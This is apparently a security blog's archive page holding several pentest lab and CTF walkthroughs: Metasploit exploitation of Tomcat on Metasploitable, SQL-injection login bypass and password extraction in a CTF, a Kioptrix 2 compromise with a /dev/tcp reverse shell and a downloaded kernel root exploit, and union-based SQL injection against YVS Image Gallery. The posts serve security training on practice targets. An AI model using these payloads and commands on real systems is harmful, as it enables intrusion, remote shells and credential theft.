Posted by Infosec Shinobi | Posted in Security Videos | Posted on 09-12-2014
0
This video demonstrates how to exploit the Apache tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed to practice penetration testing.
In this video, I will show you how to scan the system, find one of the vulnerable services "Apache Tomcat" and then exploit the service to gain root access.
Steps
Use Netdiscover to get the IP address of our target (Reconnaisance)
Use Nmap to do a detailed scan of the target (Information Gathering)
Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
Use Metasploit to upload and execute the payload (Remote Access)
Use Metasploit to gain root privileges (Privilege Escalation)
Commands
ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami
Notes
Song – Bucie feat Heavy K – Easy to Love
Video Length – 8minutes
Conclusion
At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real world pentest scenario, we would try to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire Network.
The CTF was based mostly on SQL Injection vulnerabilities found in web applications. The goal was to find 2 hidden flags and submit them to ctf.NotSoSecure.com and to also stand a chance at getting one free ticket to the AppSec USA Conference plus $125 cash.
Find below a workthrough of how I did this
Steps
I started off by trying to guess usernames/passwords using the common ones i.e. admin/admin, admin/pass, admin/1234, etc but the web application kept throwing up errors.
So next step was to try and check the request/response being sent to/recieved by the server.
I configured my Burp Proxy so I could interfere all requests being sent; while looking closely, I noticed there was an additional data embedded in the 302 response I got "7365637265745f72656769737465722e68746d6c".
I immediately sent it to the hex decoder, decrypted it to plain text and lo and behold, I had "secret_register.html".
So I fired up my browser again and visited "http://ctf.notsosecure.com/71367217217126217712/secret_register.html".
Right before me was a "Registration Page". I then tried registering with admin but got an error that the username "admin" had been taken.
Next step was to sign up using another username. This time, I used "hax0r123" and I was able to register and I eventually logged in as user "hax0r123".
After checking everything else, I resorted to checking my cookies and realised I had 2 cookies : PHPSESSID and session_id.
The session_id cookie looked suspicious especially 'cos it looked like a base64 encoded string. I then fired up my browser again and visited http://www.snarkles.net/scripts/sneak/sneak.php so I could decrypt it. Decrypted it and found out it was the email we registered with that got encoded.
I then tried re-registering with email "testing1234@test.com" and also realised the same thing: our registered email account gets base64 encoded and reflects back to the page.
Next step was to register with username : bb' or 'bb' = 'bb
When sent, we'll have a query like this "SELECT * FROM Users WHERE Username=bb' or 'bb' = 'bb //We are assuming that the tablename "users" and the columnname "username" exists.
I logged in, viewed the cookie, decrypted the base64 string "YWRtaW5Ac3FsaWxhYnMuY29t" and we had "admin@sqlilabs.com".
Next step was to retrieve the password but first, we had to get the tablename. .
So we used the query "rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1"
I was actually telling the web app to select the tablename that has a column_name like "pass". .I registered, checked the cookie field, decrypted the string and I found out we have a table called "users".
Next step was to pull the password from the table "users" using the query
"rotimi' union all select password from users–"
But after this, I discovered we had only 1 cookie "PHPSESSID" and the other cookie "session_id" was deleted. I immediately knew there was something wrong with the query.
So I added a second column and my new query became
"rotimi' union all select password,null from users–"
I checked the cookies, decrypted the session_id value and poof, I had the password "sqlilabRocKs!!"
So I logged in with username/password : admin/sqlilabRocKs!! aand I was logged in as the admin.
I also went further to see if we have access to load files using the query
"rotimi' and 1=2 union select load_file('/etc/passwd'),null–"
w000t?!!!
Commands
rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1
rotimi' union all select password from users--
rotimi' union all select password,null from users--
Username : admin@sqlilabs.com
Pssword: sqlilabRocKs!!
rotimi' and 1=2 union select load_file('/etc/passwd'),null--
Sadly, I wasn't able to get the 2nd flag but then, this exercise was awesome and at the same time challenging.
Posted by Infosec Shinobi | Posted in Security Videos | Posted on 17-10-2013
0
Difficulty
Intermediate
Details
This video details the exploitation of a blind SQL injection in a PHP based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker will be able to gain code execution on the server by using a configuration issue.This video is a detailed walkthrough to a hacking challenge created by PentesterLab.
What you will learn?
Blind SQL injection exploitation using time-based exploitation
Posted by Infosec Shinobi | Posted in Security Videos | Posted on 30-08-2012
6
It's been a while I last updated this blog (been working on some projects lately), but I had to steal time out to make this.
In this session, we will be having a look at gaining root priviledges using command execution
Overview
Our target system is Kioptrix 2.
Kioptrix is a “Vulnerable-By-Design OS” which serves as a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine.
The video describes a step-by-step way of going about this.
* Nmap – (Can be found on BackTrack 5-R2). Download here
* Firefox – (Can be found on BackTrack 5-R2)
* Linux Kernel 2.6 Root Exploit – (Can be found on exploit-db.com)
Steps
* Discover network for hosts (Netdiscover)
* Scan target network (Nmap)
* Bypass login screen (MySQL Injection)
* Set NetCat to listen on attack machine
* Inject bash reverse shell.
* Navigate to directory where apache user can write files (cd /tmp)
* Search for Local privilege escalation exploit for linux kernel version 2.6
* Download exploit code and host it on attack machine
* Use reverse shell to wget exploit code to Victim’s machine
* Compile exploit code and Execute.
* Game Over
Commands
netdiscover –r 192.168.61.0/24
nmap 192.168.61.130 –p 1-65500 –o –sS –sV –v
clear
firefox 192.168.61.130
-> User: admin
-> Password: 1’ or ‘1--
; cat index.php
nc –lvvp 4000
// We want to get a basic shell on the server, so we’ve setup our netcat listener to listen on port 4000 for the shell
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0
//Using bash, we have successfully created our connect back shell code with a single line of command
uname –a
whoami
// we are still apache user and the objective says we should be “root”
Cat /etc/issue
Firefox www.exploit-db.com
Search for “linux kernel 2.6”
Download ip_append_data() local ring0 root exploit
wget 192.168.61.128/9542.c
//Download the exploit code “9542.c” to the victim’s machine
gcc 9542.c –o RootMeNow
//Compile the exploit code
./RootMeNow
cat /etc/passwd
cat /etc/passwd && whoami && uname –a
cd /var/www
cd html
ls
whoami
##### #######
# # ## # # ###### # # # # ###### #####
# # # ## ## # # # # # # # #
# #### # # # ## # ##### # # # # ##### # #
# # ###### # # # # # # # # #####
# # # # # # # # # # # # # #
##### # # # # ###### ####### ## ###### # #
YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails. As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.
//Open on firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--
//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--
//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel
##### #######
# # ## # # ###### # # # # ###### #####
# # # ## ## # # # # # # # #
# #### # # # ## # ##### # # # # ##### # #
# # ###### # # # # # # # # #####
# # # # # # # # # # # # # #
##### # # # # ###### ####### ## ###### # #